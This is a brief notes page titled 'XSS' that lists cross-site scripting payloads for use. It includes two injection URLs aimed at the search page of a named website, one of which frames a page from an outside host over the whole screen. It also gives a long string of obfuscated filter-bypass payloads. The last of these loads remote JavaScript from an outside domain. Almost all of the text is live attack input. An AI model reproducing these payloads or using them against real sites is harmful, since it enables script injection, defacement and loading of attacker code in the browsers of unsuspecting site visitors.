XSS -
Trying something & experimenting new oneliner that helps in finding xss,sql,ssrf,cmdi,htmli
https://smoothways.net/search.php?keyword=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E
https://smoothways.net/search.php?keyword=%22%3E%3Ciframe%20src%3D%22https%3A%2F%2Fcoffinxp.000webhostapp.com%2FCoffinEncript3.html%22%20style%3D%22border%3A%200%3B%20position%3Afixed%3B%20top%3A0%3B%20left%3A0%3B%20right%3A0%3B%20bottom%3A0%3B%20width%3A100%25%3B%20height%3A100%25%22%3E
<iframe/src="data:text/html,<svg onload=alert(1)>"><input type=image src onerror="prompt(1)"><svg onload=alert(1)//<img src="/" =_=" title="onerror='prompt(1)'"><img src='1' onerror='alert(0)' <<script x> alert(1) </script 1=2<script x>alert('XSS')<script y><svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//<svg////////onload=alert(1)><svg id=x;onload=alert(1)><svg id=`x`onload=alert(1)><img src=1 alt=al lang=ert onerror=top[alt+lang](0)><script>$=1,alert($)</script><script ~~~>confirm(1)</script ~~~><script>$=1,\u0061lert($)</script><</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script><</script/script><script ~~~>\u0061lert(1)</script ~~~></style></scRipt><scRipt>alert(1)</scRipt><img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)><svg><x><script>alert('1')</x><iframe src=""/srcdoc='<svg onload=alert(1)>'><svg><animate onbegin=alert() attributeName=x></svg><img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)><img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);"Last updated
